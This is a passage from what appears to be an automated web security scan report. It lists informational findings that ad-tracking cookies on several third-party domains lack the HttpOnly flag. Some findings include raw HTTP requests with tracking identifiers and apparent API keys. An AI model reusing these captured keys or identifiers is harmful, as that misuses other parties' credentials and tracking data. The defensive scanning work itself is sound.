CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-2; expires=Mon, 06 Aug 2012 10:53:19 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-2; expires=Mon, 06-Aug-2012 10:53:19 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.73. http://amch.questionmarket.com/adsc/d844890/33/39959895/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d844890/33/39959895/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Wed, 16 Jun 2010 19:08:58 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2; expires=Mon, 06 Aug 2012 11:08:59 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-:A; expires=Mon, 06-Aug-2012 11:08:59 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.74. http://amch.questionmarket.com/adsc/d844890/33/39959897/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d844890/33/39959897/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Wed, 16 Jun 2010 19:14:09 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-1_39959897-33-2; expires=Mon, 06 Aug 2012 11:14:10 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-ZE; expires=Mon, 06-Aug-2012 11:14:10 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.75. http://api.bizographics.com/v1/profile.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe3issEgfzSEAY1ExkNK7HUtFp4B4dlWpgdhuAlTUnPBEYj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe08y7VMjWLN6FExkNK7HUtFp4B4dlWpgdgD0CnxkWGt3T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

11.76. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2tvsTu4EM2aVExkNK7HUtFp4B4dlWpgdii5wmxEk54PYz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?callback_url=http%3A%2F%2Fpix04.revsci.net%2FD10889%2Fa1%2F0%2F3%2F0.gif%3FD%3DDM_LOC%3Dhttp%3A%2F%2Fbizo.com%3F&api_key=bbe168f7d7bf46369bbe29684c749a27 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe08y7VMjWLN6FExkNK7HUtFp4B4dlWpgdgD0CnxkWGt3T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

11.77. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BMX_G=recruitFrequency%2D%3E1%2Cpid%2D%3Ep85001580%2Cprad%2D%3E62126627%2Car_c%2D%3E42474885%2Cmethodology%2D%3E4%2Cinv%2D%3Einv_3_300x250%2Cgrp%2D%3E1%2Clocation%2D%3Ehttp%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2FN3867%2E270604%2EB3%2FB5387288%2E7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fh%2Eclick%2FaWmOQKXWQAmW6x4mvQ5Vj9VVF8UVbiPPJwUHJVWrb55UZarWajnVEn9QTULQGQKQFAqPtniWVYQ5bipodisYaqy3HrDPcJZa463ImdayTHYb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBdkZcMwq%2Fhttp%3A%2F%2Fb3%2Emookie1%2Ecom%2FRealMedia%2Fads%2Fclick_lx%2Eads%2FTribalFusionB3%2FRadioShack%2FSELL_2011Q2%2F728%2FL41%2F1958421561%2Fx90%2FUSNetwork%2FRS_SELL_2011Q2_TF_GEN_728%2FRadioShack_SELL_2011Q2%2Ehtml%2F726348573830334f56626741436d4566%3F%3Bord%3D1958421561%3F%2Creferrer%2D%3Ehttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fp%2Emedia%2FaMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d%2F2546166%2FadTag%2Ehtml%2Cpath%2D%3Ehttp%3A%2F%2Far%2Evoicefive%2Ecom%2Fbmx3%2F%2Cbranding%2D%3Eb3%2Cversion%2D%3E3%2E0%2Csite%2D%3E500%2Cdelay%2D%3E5000%2Cdom%2D%3E121%2Cinv_type%2D%3E3%2Cts%2D%3E1308233340%2E003%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.78. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; expires=Wed 14-Sep-2011 14:08:59 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.79. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:24 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:24 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.80. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; expires=Wed 14-Sep-2011 18:27:25 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.81. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 15-Jun-2013 10:51:03 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.82. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 15-Jun-2013 11:22:21 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.83. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=4a757a7-24.143.206.42-1305663172; expires=Sat, 15-Jun-2013 12:51:27 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.84. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A3=le30aXzs06hH00001hITfaPj402WG00001kkgaaRpa038X00001jDClaTYi0cbS00001iWmhaSED0cb100001kfxTaPj40aLz00001jkozaUUI0c7w00001kWgdaUUO09SF00001jDDbaTYi0cbS00001jmdWaRBM0c7w00001htTqaPvL02WG00001kfL6aPj30aLz00001jNtbaUUO09sO00000kDBSaRp908HF00001kDFiaPj408HF00001iOnPaUUK03sY00001jpQXaRwv05qO00001kMmAaPj208B400001jxYWaUMm0bn800001iOpqaUUK03sY00001jDDnaUUx0cbS00001hWjPaRu109wy00002kHfhaPj302WG00001jkncaRBL0c7w00001kSTxaRuU06yP00001jBrJaXnt035P00001jA0ZaPj206hH00001jkpdaPj30c7w00001kGfMaPj208HF00002kCKXaXnm08HG00001jNtfaUUK09sO00000kMqaaPj302WG00001kDAVaRp908HF00001kZ5yaTDK07Y700001kQ2WaUUO0dKm00001kHhnaUnJ02WG00001iBmTaRqF08te00001kEncaRLI0alG00001kcLvaUUK0dCb00001lu0naYv80czN00002; expires=Wed, 14-Sep-2011 11:52:11 GMT; domain=.serving-sys.com; path=/
B3=a9iq0000000001uQ8Vlw0000000001u+990p0000000001v59j0T0000000001u+9cm20000000001uT8nlR0000000001uK9ZD90000000001uQamoJ0000000001v5alVe0000000001u+ajUW0000000001u+8DfZ0000000001uKa0fG0000000001uZ9XzA0000000001u+ahIj0000000001uK89+70000000001uQahI50000000001uK9i8d0000000001uK93LT0000000001uQ84hR0000000002uQa9it0000000001uQ9xux0000000001uX9i8b0000000001uK8DfJ0000000001uK9X5M0000000001uW9D2u0000000000u+9D2y0000000000u+9iQ70000000002uQaF7y0000000002v87dOu0000000001uY9xuy0000000001uX9v4a0000000001uKa9j40000000001uK9gvS0000000001uK9XJ40000000001uR8Vlx0000000001u+9xup0000000001u+9qZf0000000001uQ7dYp0000000001uK9gvT0000000001uK90mq0000000001v5; expires=Wed, 14-Sep-2011 11:52:11 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.85. http://c7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

FFAbh=897B305,20|165_2#365;expires=Fri, 15 Jun 2012 11:29:29 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.86. http://cas.criteo.com/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cas.criteo.com
Path:	/delivery/afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

udc=*1CHZCRgIx6nSg3nCboPSuV5GDm6LZbYWApuRyCJPc%2bhchb5KpLbYf1Lu3OAJhT9WT3pwfiRHdLJOgnKf1ltoJegC3En0YtacsPpePTD4Vs%2femUcMNCMz2iyF3TS35px7NaUtIpAen77OgY4z8Fw92jSb5amVKhnzpAgWyOIczt3gvErTOrDuHbNuDjHOBlH30xvNbTy74RniR04mX6Oj1XZN%2feyZMFLdzAqv49%2f%2fIw4I%3d; domain=.criteo.com; expires=Fri, 16-Dec-2011 14:08:02 GMT; path=/
udi=*1wQWNbHL2BkixwAS4DgWF1g%3d%3d; domain=.criteo.com; expires=Fri, 17-Jun-2011 13:08:02 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.87. http://citi.bridgetrack.com/usc/_spredir.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/usc/_spredir.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=42945&VTIPUB=705&TX=1308307520&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&VTIVEN=1805&SID=82D8AD156EDD44FCB7E16445B26D706E; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBTSES=SID=995AE0F7C91A4ECD81FEE7C2D4CEDD80; path=/
ATC9=46403d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199K3Gcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1ccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6=T=1308307519699; expires=Fri, 17-Jun-2011 15:46:18 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631524242 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6=T=1308307220482; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6=T=1308307227000; TVMC0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6=T=1308307229238; TVMC0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6=T=1308307241722; ATC9=61379d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hccccccccc; CitiBTSES=SID=995AE0F7C91A4ECD81FEE7C2D4CEDD80; 